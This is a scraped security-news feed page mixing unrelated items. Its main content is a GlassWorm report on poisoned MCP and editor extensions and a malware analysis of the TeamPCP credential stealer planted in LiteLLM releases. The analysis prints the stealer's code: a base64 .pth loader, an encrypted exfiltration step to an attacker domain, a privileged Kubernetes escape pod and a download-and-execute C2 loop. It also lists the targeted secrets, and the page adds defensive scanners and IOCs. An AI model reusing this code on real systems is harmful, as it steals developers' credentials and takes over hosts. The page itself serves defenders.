The memos are permanent, publicly visible on-chain, and stored on infrastructure that cannot be taken down by any single party.”</p><p>The second-stage payload delivers a framework used to harvest credentials, steal crypto wallets, exfiltrate cloud secrets, and profile hosts.</p><p>In the third stage, the malware downloads a phishing binary targeting crypto wallets and the RAT, which can steal browser credentials, bypass Chrome app-bound encryption, deploy HVNC modules for remote access, and install a malicious browser extension.</p><h3>Turning to MCP Servers</h3><p>Koi security researcher Lotan Sery wrote that GlassWorm has “crawled into a place that should worry every developer building with AI tools: MCP servers.”</p><p>Koi’s risk engine pointed to a new npm package that initially looked to researchers like a legitimate MCP server – proper TypeScript, real dependencies, and a valid repository link – but eventually they found the GlassWorm signature: the same decoder, invisible Unicode variation selectors, and the same technique used in previous waves.</p><p>MCP servers are used to connect AI models to external data sources, tools, and applications, and have become a <a href="https://securityboulevard.com/2026/01/anthropic-microsoft-mcp-server-flaws-shine-a-light-on-ai-security-risks/" target="_blank" rel="noopener">worry of many security pros</a>.</p><p>“A compromised MCP server doesn’t need to hunt for credentials,” Sery wrote, noting that five versions, 1.3.0 through 1.3.4, were published in a single day. “They’re handed to it. That’s the whole point.”</p><p>Researchers found that the attacker forked the legitimate watercrawl-mcp repository on GitHub, injected the invisible payload, and published it under a new @iflow-mcp scope, a namespace created for the attack.</p><p>“This is GlassWorm’s first confirmed move into the MCP ecosystem,” she wrote. 
“And given how fast AI-assisted development is growing – and how much trust MCP servers are given by design – this won’t be the last.”</p><h3>Malicious Open VSX Extensions</h3><p>Socket researchers said that since January 31, they’ve identified at least 72 malicious extensions linked to the GlassWorm campaign, though Open VSX has since removed most of them. The malware has continued to evolve since the end of January.</p><p>That includes updating components most likely to be exposed, rotating the Solana infrastructure, adding C2 IPs, hardening the loader with heavier obfuscation, and shifting decryption material from the extension to operator-controlled HTTP response headers.</p><p>“GlassWorm is moving toward less visible, more resilient delivery: later-version manifest changes, transitive installation paths, heavier obfuscation, rotating Solana wallets and infrastructure, and threat actor-controlled decryption material,” they wrote. “Defenders should expect more extensions that look benign at publication, then become malicious through updates that add extensionPack or extensionDependencies. 
That model is likely to spread because it hides the real malicious component behind normal extension-management behavior.”</p>
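Two of the GlassWorm behaviours reported above are cheap to check for before an extension or package is installed: a loader hidden in runs of invisible Unicode variation selectors, and a manifest that gains extensionPack or extensionDependencies entries in a later version so that a benign-looking listing starts pulling in a second extension. The following is an added example written for this page, not code from Socket, Koi, Aikido or the GlassWorm campaign. The variation-selector ranges come from the reports; the other invisible ranges scanned (tag characters, zero-width and bidi controls) are an editor's addition as a general check. The sample source text and the two manifests are constructed, and the publisher and extension identifiers in them are hypothetical.

```python
"""Pre-install checks for editor extensions, after the GlassWorm reports.

Added example, not code from the vendors or the campaign: (1) find runs of
invisible Unicode code points in source text; (2) diff two versions of an
extension manifest for newly added extensionPack / extensionDependencies ids.
"""
import json

# Code points that render as nothing. Variation selectors are the carrier the
# reports name; the remaining ranges are added here as a general check.
INVISIBLE_RANGES = [
    (0xFE00, 0xFE0F),    # Variation Selectors
    (0xE0100, 0xE01EF),  # Variation Selectors Supplement
    (0xE0000, 0xE007F),  # Tags block
    (0x200B, 0x200D),    # zero-width space / non-joiner / joiner
    (0x2060, 0x2064),    # word joiner and invisible operators
    (0x202A, 0x202E),    # bidi embedding/override controls
    (0x2066, 0x2069),    # bidi isolate controls
    (0xFEFF, 0xFEFF),    # zero-width no-break space (BOM)
]


def is_invisible(cp):
    return any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES)


def find_invisible_runs(source, min_run=8):
    """Return (line_no, column, length) for each run of >= min_run invisible
    code points. A hidden payload is hundreds of code points long; min_run
    keeps a stray BOM or an emoji variation selector from firing.
    """
    runs = []
    for line_no, line in enumerate(source.splitlines(), 1):
        start = None
        for col, ch in enumerate(line + "\n"):  # sentinel closes a trailing run
            if is_invisible(ord(ch)):
                if start is None:
                    start = col
            elif start is not None:
                if col - start >= min_run:
                    runs.append((line_no, start, col - start))
                start = None
    return runs


def new_transitive_deps(old_manifest, new_manifest):
    """Extension ids in the new manifest's extensionPack / extensionDependencies
    that the old manifest did not have. Ids whose publisher differs from the
    extension's own publisher are also returned separately (a heuristic: a
    theme pack suddenly depending on a stranger's extension deserves a look).
    """
    def ids(m):
        return set(m.get("extensionPack", [])) | set(m.get("extensionDependencies", []))
    added = sorted(ids(new_manifest) - ids(old_manifest))
    own_publisher = new_manifest.get("publisher", "")
    foreign = [i for i in added if i.split(".", 1)[0] != own_publisher]
    return added, foreign


# Constructed sample: an ordinary line, then a comment marker followed by a
# 12-code-point run of U+E0100.. variation selectors standing in for a carrier.
SAMPLE_SOURCE = "const x = 1;\n// config" + "".join(chr(0xE0100 + i) for i in range(12)) + "\nexport {};\n"

# Constructed manifests: v1 stands alone; v2 adds a pack entry from a different
# publisher. "example" and "other-pub" are hypothetical publisher names.
MANIFEST_V1 = json.loads('{"name":"theme-pack","publisher":"example","version":"1.0.0"}')
MANIFEST_V2 = json.loads(
    '{"name":"theme-pack","publisher":"example","version":"1.0.1",'
    '"extensionPack":["example.icons","other-pub.helper-tools"]}'
)


def audit():
    """Run both checks on the constructed samples."""
    return find_invisible_runs(SAMPLE_SOURCE), new_transitive_deps(MANIFEST_V1, MANIFEST_V2)


if __name__ == "__main__":
    runs, (added, foreign) = audit()
    for line_no, col, length in runs:
        print(f"invisible run: line {line_no} col {col} length {length}")
    print("new transitive deps:", added, "from other publishers:", foreign)
```

Run the first check over every `.js`, `.ts` and `.json` file in a downloaded `.vsix` or npm tarball before installing it; a single hit of a dozen or more consecutive invisible code points in source is not something a legitimate project produces. The second check needs the previous version's `package.json`, which a registry mirror or an internal allow-list can retain, and is the direct counter to the update-time manifest change Socket describes.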

Grounded Intelligence Is Key to Safe AI Software Development at Scale

  • None
  • Published date: 2026-03-25 00:00:00

None

<p>One experience has become nearly universal as <a href="https://www.sonatype.com/resources?category=186977656491">AI systems</a> move deeper into software development: their confidence when they’re wrong.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale">https://www.sonatype.com/blog/grounded-intelligence-is-key-to-safe-ai-software-development-at-scale</a> </p>

Entro Security Launches AGA to Govern AI Agents and Non-Human Identities Across the Enterprise

  • None
  • Published date: 2026-03-25 00:00:00

None

<p>Entro Security has announced Agentic Governance &amp; Administration (AGA), a new pillar of its platform designed to help security and identity teams govern AI agents and AI access paths across enterprise systems. The company is showcasing AGA at RSA Conference 2026.</p><p>The core problem AGA addresses is one that traditional Identity Governance and Administration (IGA) tools weren’t built to solve. Existing IGA platforms govern people and applications, but agentic AI operates differently. The “user” is often an AI service or locally running agent. Access paths run through non-human identities: tokens, service accounts, API keys, and secrets. And the blast radius is shaped by OAuth scopes, integrations, and automation, not a single human login.</p><p>“Enterprise AI adoption rarely starts with a strategy deck. It starts with a connection,” said Itzik Alvas, Co-Founder and CEO of Entro Security. “A developer connects a tool to an LLM, a team installs an AI app in SaaS, or someone authenticates an agent against SharePoint, GitHub, Salesforce, or internal APIs. It works, spreads fast, and then security teams get questions they can’t answer fast enough. Who connected what, to which systems, with what permissions, and using which identities? Our AGA helps teams regain clarity and control as AI access becomes the default.”</p><p>AGA applies the same governance fundamentals that IAM teams already know, adapted for a world where agents connect in seconds, operate continuously, and drift as adoption spreads. 
The capability covers inventory, ownership, least privilege, auditability, and enforcement, applied to AI assistants, agent platforms, and locally running agents.</p><p>On the technical side, AGA builds a structured profile for each AI agent by pulling from three layers: sources (endpoint telemetry, agent foundries, cloud environments, MCP servers), targets (enterprise assets and applications the agent touches), and identities (human, non-human, or secret identities used to access those targets).</p><p>Two core capabilities sit on top of that foundation. Shadow AI Discovery uses EDR integrations to surface AI clients and local agent runtimes on workstations, and connects natively with agent foundries including AWS Bedrock and Copilot Studio to discover agents and the non-human identities they rely on. AI Agents Monitoring and Enforcement adds MCP activity visibility and policy controls, giving teams audit trails of allowed and blocked activity and controls to reduce sensitive data and secret exposure.</p><p>AGA is available now as part of the Entro platform.</p>

Tributes for Mel Schilling, who died of Australia's deadliest cancer

  • Shari Hams
  • Published date: 2026-03-24 23:49:05

Mel Schilling became one of Australian TV’s most recognised relationship experts, but who was she, and what led to her death?

Mel Schilling emerged as one of Australian television's most recognisable relationship experts. On Tuesday, she died of bowel cancer at the age of 54. As a judge on the hit reality show Married At … [+5692 chars]

Equipping leaders to tackle an evolving digital security landscape

  • None
  • Published date: 2026-03-24 01:27:05

Newcastle Australia Institute of Higher Education’s new Master of Cyber Security pairs technical depth with human factors, ethics and governance to cultivate interdisciplinary skills for leadership roles.

Newcastle Australia's newly launched Master of Cyber Security, currently offered part-time, is designed to build that breadth and depth. The programme prepares professionals for roles such as security a… [+1859 chars]

Google Unleashes Gemini AI to Scour Dark Web for Corporate Threats

  • Jon Swartz
  • Published date: 2026-03-24 00:00:00

None

<p>Google has launched a new dark web intelligence service to tackle the grueling task of monitoring underground criminal forums.</p><p>It is deploying Gemini-powered artificial intelligence (AI) agents to sift through upwards of 10 million posts daily, the tech giant said, to replace clunky, keyword-based legacy systems with a platform that understands the context of a threat.</p><p>The service, currently in public preview as part of Google Threat Intelligence, marks a shift from reactive monitoring to proactive profiling. According to Google threat hunters, internal testing indicates the AI can analyze millions of external events with an impressive 98% accuracy rate.</p><p>As cybercriminals increasingly adopt AI to craft more sophisticated attacks, Google is betting that its own generative models are the only way for defenders to keep pace with the sheer volume of modern digital threats.</p><p>Traditional dark web monitoring has long been a headache for security teams. These older tools typically rely on regex (regular expressions) and simple keyword scraping, which Brandon Wood, Google Threat Intelligence product manager, says results in an 80% to 90% false-positive rate.</p><p>“It mostly just creates noise,” Wood told The Register. “We are now processing every post from the dark web using Gemini, and from there distilling down what threats actually matter.”</p><p>The process begins with Gemini building a comprehensive profile of a client organization — such as a bank or healthcare provider — by analyzing its business operations, VIPs, brands, and technology stack. The profile is built using cited, publicly available information to maintain transparency. Once established, Gemini compares this profile against real-time dark web data, including initial access broker activity and leaked credentials.</p><p>The true power of the system lies in its ability to handle ambiguity. 
For example, if a cybercriminal advertises access to a large North American bank with $50 billion in assets without naming the victim, Gemini can cross-reference those specific metrics against its client profiles. If the data matches a user like Acme Bank, the system triggers a high-severity alert.</p><p>To refine its judgment, Gemini integrates insights from Google’s human analysts, who currently track 627 distinct threat groups. This hybrid intelligence allows the AI to weigh the reputation of the threat actor against the sensitivity of the leaked data.</p><p>Beyond dark web monitoring, Google is expanding AI agents into its Security Operations (SecOps) suite to automate incident response. These agents can autonomously investigate alerts, gather evidence, and provide a verdict on whether a breach has occurred, complete with a written explanation of their reasoning.</p><p>However, the move toward autonomous security agents is not without its critics. Security experts warn that giving AI agents deep access to corporate environments could inadvertently create a new attack vector for hackers to exploit.</p><p>Wood addressed these concerns by emphasizing that Google is focusing on “publicly available information and context that the user chooses to provide.” He noted that transparency and user control remain central to the platform’s integration.</p>

TeamPCP Supply Chain Attack Part 2: LiteLLM PyPI Credential Stealer

  • None
  • Published date: 2026-03-24 00:00:00

None

<p><strong>Last Updated:</strong> March 24, 2026 – 1:15 PM ET</p><p>Part 1 covered CanisterWorm, the self-spreading npm worm. This post covers the next wave: a malicious LiteLLM PyPI package carrying the most capable credential stealer TeamPCP has deployed yet.</p><p>On March 24, 2026, two versions of <code>litellm</code>, one of the most widely used Python libraries for working with AI language model APIs, were published to PyPI carrying a hidden credential stealer. Versions <code>1.82.7</code> and <code>1.82.8</code> never appeared on the official LiteLLM GitHub repository. They were published directly to PyPI using credentials stolen from a maintainer account, which TeamPCP obtained as part of their ongoing cascade of supply chain compromises.</p><h2 class="wp-block-heading" id="how-teampcp-got-into-litellm"><strong>How TeamPCP got into LiteLLM</strong></h2><p>To understand this attack you need to follow the credential chain back four days.</p><p>On March 19, TeamPCP force-pushed malicious commits over 75 of 76 version tags of <code>aquasecurity/trivy-action</code> and poisoned Trivy release <code>v0.69.4</code>. Any CI/CD pipeline that ran Trivy that day had its secrets harvested and exfiltrated to the attacker.</p><p>LiteLLM’s CI pipeline (<code>ci_cd/security_scans.sh</code>) installed Trivy via apt without pinning a version. When the pipeline ran on March 23, it pulled the poisoned Trivy build. The stealer inside Trivy ran inside LiteLLM’s CI environment, collected everything, including <code>PYPI_PUBLISH_PASSWORD</code> for the krrishdholakia maintainer account, and shipped it to <code>checkmarx.zone</code>.</p><p>On March 23, TeamPCP also compromised <code>checkmarx/kics-github-action</code> (all 35 tags hijacked) and <code>checkmarx/ast-github-action</code> (version 2.3.28 poisoned), expanding their credential collection to every pipeline that used Checkmarx scanning. 
The litellm.cloud domain was registered the same day.</p><p>By March 24 they had everything they needed. Two malicious LiteLLM versions hit PyPI within hours of each other.</p><h2 class="wp-block-heading" id="what-changed-between-1-82-7-and-1-82-8"><strong>What changed between 1.82.7 and 1.82.8</strong></h2><p>The two versions represent a deliberate escalation in how the payload triggers.</p><p><strong>Version 1.82.7</strong> hid the malicious code inside <code>litellm/proxy/proxy_server.py</code>. The payload only ran when a developer or application explicitly imported <code>litellm.proxy</code>, a common path when running the LiteLLM proxy server, but not universal.</p><p><strong>Version 1.82.8</strong> moved the same payload into a file named <code>litellm_init.pth</code> placed in the package’s site-packages directory. This changes everything. Python’s site module processes every .pth file in site-packages on startup, executing any line that begins with <code>import</code>. No import statement is needed in application code. No user interaction. 
<strong>The payload fires every time Python starts on the infected machine</strong>, regardless of whether LiteLLM is ever used.</p><p>The upgrade from a module-level hook to a <code>.pth</code>-level hook is significant: it means the malware persists and re-runs even after the malicious package is uninstalled, as long as the <code>.pth</code> file remains in site-packages.</p><h2 class="wp-block-heading" id="technical-analysis"><strong>Technical analysis</strong></h2><h3 class="wp-block-heading" id="three-layers-one-goal"><strong>Three layers, one goal</strong></h3><p>The payload uses three nested layers of base64 encoding to obscure its code from static scanners.</p><pre class="wp-block-code"><code>import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('&lt;blob&gt;'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)</code></pre><p><sub><strong>Figure 1:</strong> Outer <code>.pth</code> execution — fires on every Python startup with no user action</sub></p><p>Decoding the blob reveals the orchestrator script, which holds an embedded RSA-2048 public key and a second base64-encoded payload (the harvester). The orchestrator runs the harvester as a subprocess, captures everything it prints to stdout, encrypts the output, and ships it out.</p><pre class="wp-block-code"><code>subprocess.run(["openssl", "rand", "-out", sk, "32"])
subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected,
    "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"])
subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin",
    "-inkey", pk, "-in", sk, "-out", ek,
    "-pkeyopt", "rsa_padding_mode:oaep"])
# bundles as tpcp.tar.gz, POSTs to models.litellm.cloud</code></pre><p><sub><strong>Figure 2:</strong> Encryption and exfiltration pipeline — output is encrypted before leaving the machine</sub></p><p>The data is AES-256-CBC encrypted with a random session key. 
The session key is RSA-OAEP encrypted with the attacker’s public key. Only the attacker can decrypt what was stolen. The archive is named <code>tpcp.tar.gz</code>, a direct self-reference by TeamPCP.</p><h3 class="wp-block-heading" id="the-credential-harvester"><strong>The credential harvester</strong></h3><p>The second-stage script is an exhaustive credential collector. In plain terms: it reads every file on the system that could contain a password, token, or private key, and sends all of it.</p><p>It specifically targets:</p><ul class="wp-block-list"> <li><strong>SSH keys</strong> – all key types, authorized_keys, known_hosts, host keys from <code>/etc/ssh</code></li> <li><strong>AWS credentials</strong> – environment variables, <code>~/.aws/credentials</code>, and live queries to the EC2 Instance Metadata Service (IMDS) to steal IAM role credentials</li> <li><strong>Kubernetes</strong> – service account tokens, <code>~/.kube/config</code>, all secrets across all namespaces via the K8s API</li> <li><strong>GCP and Azure</strong> – application default credentials, <code>~/.azure</code> directory contents</li> <li><strong>Docker</strong> – <code>config.json</code> including registry tokens, Kaniko build credentials</li> <li><strong>npm tokens</strong> – <code>~/.npmrc</code> (connecting directly to the npm side of this campaign)</li> <li><strong>Database configs</strong> – <code>.pgpass, .my.cnf, redis.conf, .mongorc.js</code></li> <li><strong>Environment files</strong> – <code>.env, .env.production, .env.staging</code> searched recursively to depth 6 across <code>/home, /opt, /srv, /var/www, /app, /data, /tmp</code></li> <li><strong>Cryptocurrency wallets</strong> – Bitcoin, Ethereum keystores, Solana validator keypairs, Cardano signing keys, Zcash, Ripple, Litecoin, Dogecoin</li> <li><strong>TLS/SSL private keys</strong> – <code>*.pem, *.key, *.p12, *.pfx</code>, Let’s Encrypt certs</li> <li><strong>CI/CD secrets</strong> – <code>terraform.tfvars, terraform.tfstate</code>, Jenkinsfile, <code>.travis.yml, .gitlab-ci.yml, .drone.yml</code></li> <li><strong>System information</strong> – hostname, username, full <code>printenv, /etc/passwd, /etc/shadow</code>, SSH login history</li> </ul><p>It also queries the AWS Secrets Manager and SSM Parameter Store directly using any AWS credentials it finds.</p><h3 class="wp-block-heading" id="kubernetes-cluster-escape"><strong>Kubernetes cluster escape</strong></h3><p>If the infected machine is running inside a Kubernetes pod with a service account token at <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>, the harvester escalates:</p><pre class="wp-block-code"><code>pod_manifest = {
    'spec': {
        'hostPID': True, 'hostNetwork': True,
        'tolerations': [{'operator': 'Exists'}],
        'containers': [{
            'image': 'alpine:latest',
            'command': ['sh', '-c', drop_cmd],
            'securityContext': {'privileged': True},
            'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]
        }],
        'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}]
    }
}
k8s_post('/api/v1/namespaces/kube-system/pods', pod_manifest)</code></pre><p><sub><strong>Figure 3:</strong> Privileged pod manifest deployed to every cluster node; it mounts the host filesystem, which the drop command then enters via chroot</sub></p><p>It enumerates every node in the cluster and deploys this pod to each one. The pod mounts <code>/</code> from the host and uses <code>chroot</code> to install the backdoor directly onto the underlying node, outside the container boundary.</p><h3 class="wp-block-heading" id="persistence-backdoor"><strong>Persistence backdoor</strong></h3><p>After exfiltration, the harvester drops a polling backdoor to <code>~/.config/sysmon/sysmon.py</code> and registers it as a systemd user service (<code>sysmon.service</code>). 
The backdoor checks <code>https://checkmarx.zone/raw</code> every 50 minutes for a URL, downloads whatever binary it points to, writes it to <code>/tmp/pglog</code>, and executes it.</p><pre class="wp-block-code"><code>C_URL   = "https://checkmarx.zone/raw"
TARGET  = "/tmp/pglog"
STATE   = "/tmp/.pg_state"

time.sleep(300)   # 5-minute sandbox evasion delay
while True:
    l = g()       # fetch URL from C2
    if l and l != prev and "youtube.com" not in l:
        e(l)      # download and execute
    time.sleep(3000)</code></pre><p><sub><strong>Figure 4:</strong> C2 polling loop with YouTube kill-switch — identical logic to CanisterWorm’s pgmon backdoor</sub></p><p>The <code>youtube.com</code> kill-switch, the <code>/tmp/pglog</code> target path, the <code>/tmp/.pg_state</code> state file, and the 300/3000-second timing are <strong>identical</strong> to the backdoor deployed by CanisterWorm on npm. This is the same codebase, the same actor.</p><h2 class="wp-block-heading" id="attribution-same-actor-bigger-payload"><strong>Attribution: Same actor, bigger payload</strong></h2><p>The connection to TeamPCP and CanisterWorm is direct:</p><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Indicator</strong></th> <th><strong>This malware</strong></th> <th><strong>CanisterWorm (npm)</strong></th> </tr> </thead> <tbody> <tr> <td>Exfil archive</td> <td><code>tpcp.tar.gz</code></td> <td>actor name “TeamPCP”</td> </tr> <tr> <td>C2 state file</td> <td><code>/tmp/.pg_state</code></td> <td><code>/tmp/.pg_state</code></td> </tr> <tr> <td>C2 payload target</td> <td><code>/tmp/pglog</code></td> <td><code>/tmp/pglog</code></td> </tr> <tr> <td>Backdoor poll interval</td> <td>3000 seconds</td> <td>3000 seconds</td> </tr> <tr> <td>Startup delay</td> <td>300 seconds</td> <td>300 seconds</td> </tr> <tr> <td>Kill-switch</td> <td><code>youtube.com not in url</code></td> <td><code>youtube.com not in url</code></td> </tr> <tr> <td>Persistence 
mechanism</td> <td>systemd user service</td> <td>systemd user service</td> </tr> </tbody> </table> </figure><p>The LiteLLM payload is a significant capability upgrade over CanisterWorm. Where CanisterWorm’s Python backdoor slot held a placeholder (<code>hello123</code>), this is the real thing, a production-grade stealer with AWS API integration, K8s cluster escape, cryptocurrency wallet enumeration, and RSA-encrypted exfiltration.</p><h2 class="wp-block-heading" id="indicators-of-compromise"><strong>Indicators of compromise</strong></h2><h3 class="wp-block-heading" id="network"><strong>Network</strong></h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Indicator</strong></th> <th><strong>Purpose</strong></th> </tr> </thead> <tbody> <tr> <td><code>hxxps://models.litellm[.]cloud/</code></td> <td>Exfiltration endpoint</td> </tr> <tr> <td><code>hxxps://checkmarx[.]zone/raw</code></td> <td>C2 polling for payload URL</td> </tr> <tr> <td><code>hxxp://169.254.169.254/latest/meta-data/iam/security-credentials/</code></td> <td>AWS IMDS credential theft</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="filesystem"><strong>Filesystem</strong></h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Path</strong></th> <th><strong>Description</strong></th> </tr> </thead> <tbody> <tr> <td><code>~/.config/sysmon/sysmon.py</code></td> <td>Persistent C2 backdoor</td> </tr> <tr> <td><code>~/.config/systemd/user/sysmon.service</code></td> <td>Systemd persistence unit</td> </tr> <tr> <td><code>/tmp/pglog</code></td> <td>Downloaded payload binary</td> </tr> <tr> <td><code>/tmp/.pg_state</code></td> <td>C2 state tracking</td> </tr> <tr> <td><code>litellm_init.pth</code> in site-packages</td> <td>Malicious <code>.pth</code> loader (v1.82.8)</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="kubernetes"><strong>Kubernetes</strong></h3><ul class="wp-block-list"> <li>Pods 
named <code>node-setup-*</code> in namespace <code>kube-system</code></li> <li>Created with <code>hostPID: true, hostNetwork: true, privileged: true</code></li> </ul><h3 class="wp-block-heading" id="cryptographic"><strong>Cryptographic</strong></h3><ul class="wp-block-list"> <li>RSA-2048 attacker public key fingerprint (embedded in payload): <code>vahaZDo8mucujrT15ry+08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0...</code></li> </ul><h2 class="wp-block-heading" id="detection"><strong>Detection</strong></h2><h3 class="wp-block-heading" id="check-for-active-infection"><strong>Check for active infection</strong></h3><pre class="wp-block-code"><code># Check for backdoor service
systemctl --user status sysmon.service

# Check for backdoor script and C2 artifacts
ls -la ~/.config/sysmon/sysmon.py
ls -la ~/.config/systemd/user/sysmon.service
ls -la /tmp/pglog /tmp/.pg_state

# Check for malicious .pth in all Python environments
find $(python3 -c "import site; print('\n'.join(site.getsitepackages()))") \
  -name "*.pth" | xargs grep -l "subprocess.Popen" 2&gt;/dev/null

# Check for K8s escape pods
kubectl get pods -n kube-system | grep node-setup</code></pre><p><sub><strong>Figure 5:</strong> Detection commands for the sysmon backdoor and associated artifacts</sub></p><h3 class="wp-block-heading" id="remove-the-backdoor"><strong>Remove the backdoor</strong></h3><pre class="wp-block-code"><code>systemctl --user stop sysmon.service
systemctl --user disable sysmon.service
rm -f ~/.config/systemd/user/sysmon.service
rm -rf ~/.config/sysmon/
rm -f /tmp/pglog /tmp/.pg_state
systemctl --user daemon-reload

# Remove malicious .pth file
pip uninstall litellm
# also manually verify .pth is gone from site-packages</code></pre><p><sub><strong>Figure 6:</strong> Remediation steps for infected hosts</sub></p><h3 class="wp-block-heading" id="rotate-credentials-immediately"><strong>Rotate credentials immediately</strong></h3><p>Any machine that had Python start with <code>litellm</code> 1.82.7 or 1.82.8 installed must be 
treated as fully compromised. Rotate: AWS IAM keys, SSH keys, npm tokens, database passwords, Kubernetes service account tokens, Docker registry credentials, and any cloud provider credentials present in environment variables or config files.</p><h2 class="wp-block-heading" id="conclusion"><strong>Conclusion</strong></h2><p>The LiteLLM attack is the third major wave in TeamPCP’s March 2026 campaign. Trivy provided initial access. CanisterWorm spread through the npm ecosystem. Now a malicious PyPI package reaches a different but overlapping audience: AI and ML developers who use LiteLLM to integrate language models into applications. These pipelines routinely have access to cloud credentials, model API keys, and production infrastructure.</p><p>The upgrade from npm to PyPI, and from module-level hooks to <code>.pth</code> auto-execution, shows an actor that is actively evolving their delivery mechanisms across ecosystems while keeping the same core payload and infrastructure.<br>PyPI has quarantined the affected versions. If you are running LiteLLM, verify your installed version (<code>pip show litellm</code>) and upgrade to a clean release. 
If you were running 1.82.7 or 1.82.8 at any point, assume compromise and rotate all credentials.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/teampcp-supply-chain-series-part-2/">https://www.mend.io/blog/teampcp-supply-chain-series-part-2/</a> </p>
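The `.pth` auto-execution described above is the part of this write-up worth turning into a repeatable check, since the loader keeps firing after the package is gone and the one-line `grep` in Figure 5 only catches the literal string `subprocess.Popen`. The scanner below is an added example, not code from the Mend write-up or the LiteLLM project: it applies the rule CPython's `site` module uses when it processes a `.pth` file (a line beginning with `import` followed by a space or tab is executed; everything else is a path) and flags executed lines that carry several of the traits shown in Figure 1. The indicator patterns, the two-hit threshold and the two sample `.pth` contents are this example's own assumptions.

```python
"""Audit .pth files in site-packages for loader lines like the one in Figure 1.

Added example, not code from the Mend write-up or the LiteLLM project. It
applies the rule CPython's site module uses for .pth files (a line beginning
with "import " or "import\\t" is exec()'d at interpreter start-up) and flags
executed lines that carry several of the traits the article describes. The
indicator patterns, the two-hit threshold and the sample contents below are
this example's own assumptions.
"""
from __future__ import annotations

import re
import site
import sys
from pathlib import Path
from typing import Iterator

# Traits of the outer loader shown in Figure 1: spawn a child interpreter,
# exec() a base64-decoded blob. Each matching pattern counts as one "hit".
SUSPICIOUS = [
    re.compile(r"\bsubprocess\.(Popen|run|call|check_output)\b"),
    re.compile(r"\bexec\s*\("),
    re.compile(r"\bbase64\.b64decode\b"),
    re.compile(r"\bos\.system\b"),
    re.compile(r"\bsys\.executable\b"),
]

# Constructed samples: the first mirrors the Figure 1 one-liner with the
# payload replaced by a placeholder; the second is an ordinary benign .pth
# (a path entry plus the hook virtualenv installs).
SAMPLE_MALICIOUS_PTH = (
    'import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", '
    '"import base64; exec(base64.b64decode(\'<blob>\'))"], '
    "stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n"
)
SAMPLE_BENIGN_PTH = "# editable install\n/srv/app/src\nimport _virtualenv\n"


def executed_lines(text: str) -> Iterator[tuple[int, str]]:
    """Yield (lineno, line) for every line site.py would exec() from a .pth.

    Mirrors site.addpackage(): blank lines and '#' comments are ignored, a
    line starting with 'import ' or 'import\\t' is executed, anything else
    is treated as a directory to add to sys.path.
    """
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        if line.startswith(("import ", "import\t")):
            yield lineno, line


def score_line(line: str) -> list[str]:
    """Return the indicator patterns matched by one executed line."""
    return [p.pattern for p in SUSPICIOUS if p.search(line)]


def scan_pth_text(text: str, min_hits: int = 2) -> list[dict]:
    """Flag executed lines matching at least `min_hits` indicators.

    Legitimate hooks such as `import _virtualenv` or `import _distutils_hack`
    match nothing; requiring two hits also keeps a lone `import subprocess`
    from being reported.
    """
    findings = []
    for lineno, line in executed_lines(text):
        hits = score_line(line)
        if len(hits) >= min_hits:
            findings.append({"lineno": lineno, "hits": hits, "line": line})
    return findings


def site_package_dirs() -> list[Path]:
    """Global and per-user site-packages of the running interpreter."""
    dirs = [Path(p) for p in site.getsitepackages()]
    dirs.append(Path(site.getusersitepackages()))
    return [d for d in dirs if d.is_dir()]


def scan_site_packages(dirs: list[Path] | None = None) -> dict[str, list[dict]]:
    """Scan every .pth in the given (default: interpreter's) site-packages.

    The check does not depend on whether any package is still installed,
    which matters because the loader fires as long as the .pth file exists.
    """
    results: dict[str, list[dict]] = {}
    for d in dirs if dirs is not None else site_package_dirs():
        for pth in sorted(d.glob("*.pth")):
            try:
                text = pth.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            found = scan_pth_text(text)
            if found:
                results[str(pth)] = found
    return results


if __name__ == "__main__":
    flagged = scan_site_packages()
    for path, findings in flagged.items():
        for f in findings:
            print(f"{path}:{f['lineno']}: {len(f['hits'])} indicators: {f['line'][:100]}")
    sys.exit(1 if flagged else 0)
```

Run it with each interpreter on the host (every venv has its own site-packages); exit status 1 means at least one `.pth` file was flagged and should be read by hand before removal.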

Which Came First: The System Prompt, or the RCE?

  • None
  • Published date: 2026-03-24 00:00:00

None

